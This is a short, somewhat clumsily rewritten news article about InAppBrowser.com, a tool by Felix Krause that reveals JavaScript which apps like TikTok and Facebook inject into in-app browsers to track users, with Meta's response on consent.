Someone using the Facebook app on a phone.
Using in-app browsers could give easy access to your private information.
Photo by Amelia Holowaty Krales / The Verge

Did you know that you could be tracked when you load an in-app browser on your mobile device? A new tool shows how applications like TikTok can potentially use Javascript to view sensitive data without your permission.

There is a tool at In AppBrowser.com. All you have to do is open the app you want to check and share the InAppBrowser.com URL in, and you're good to go. You can get a report from the website if you tap the link from there.

All you need to do is open the app you want to check, and share the InAppBrowser.com URL somewhere within it

Felix Krause, the tool's developer, gives some FAQ that explain exactly what you're seeing. If you open a link from an app, be aware that the app may allow you to open the website in your default browser. Every app had a way to do this.

A security researcher, who used to work for the company, shared a report on how browsers within apps can be a privacy risk for users.

You can use in-app browsers when you tap a URL. Developers can modify the browsers to run their own Javascript code, which will allow them to track your activity without your consent.

Developers can browsers based on Safari’s WebKit to run their own JavaScript code, allowing them to track your activity.

javascript code can be injected into websites to allow apps to monitor how users interact with the app This can include information on every button or link you use, keyboard inputs, and if you take a picture.

Meta justified the use of the custom tracking script by saying that users already consent to the tracking of their data. The data is only used for targeted advertising, according to Meta.

The code was developed to honor the people who asked to be tracked on the platform. The code allows us to aggregate user data before we use it.

They asked for user consent to save payment information for the purposes of autofill.

“For purchases made through the in-app browser, we seek user consent to save payment information for the purposes of autofill.”

The tool is not perfect. He admits that it can't detect all possible Javascript commands being executed, and that Javascript is used in legitimate development. The tool doesn't show any tracking of the app using native code and it can't detect all Javascript commands executed. This allows users to check on their digital footprint in their favorite apps.

The tool is open source and designed for everyone to check out what apps are doing inside their browsers. The analysis's code is open source and you can check it out. Over time, this allows the community to improve the script. His website has more information about it.